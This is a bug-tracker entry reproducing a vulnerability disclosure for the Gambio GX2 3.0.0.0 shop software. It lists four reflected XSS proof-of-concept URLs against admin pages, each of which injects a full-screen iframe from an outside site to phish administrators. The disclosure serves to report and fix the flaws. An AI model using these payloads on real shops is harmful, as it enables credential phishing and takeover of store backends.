GX-Bug #47148
Von Daniel Würdemann vor mehr als 8 Jahren aktualisiert
Title: Multiple XSS (possible authenticated backend phishing attack)
Software: Gambio GX2
Version: 3.0.0.0
Vendor: Gambio GmbH (www.gambio.de)
Date: 23/06/2016
Credits / Author: Heiko Frenzel (www.heiko-frenzel.de)
Description:
Gambio GX2 3.0.0.0 is vulnerable to XSS attacks meaning that if an admin user can be tricked to visit a crafted URL created by attacker, the attacker is able to use phishing methods (fake login form via iframe / external content) or could compromise the admin computer by using exploits.
____________________________________________________________
____________________________________________________________
1. XSS
`Exploit: HOST/admin/customers.php?xss=[XSS]
PoC: HOST/admin/customers.php?xss="></a></td></tr></table><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">`
2. XSS
`Exploit: HOST/admin/categories.php?xss=[XSS]
PoC: HOST/admin/categories.php?xss="></a></td></tr></table><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">`
3. XSS
`Exploit: HOST/admin/specials.php?xss=[XSS]
PoC: HOST/admin/specials.php?xss=xxx"></form><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">`
4. XSS
`Exploit: HOST/admin/orders.php?xss=[XSS]
PoC: HOST/admin/orders.php?xss=xxx"></form><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">`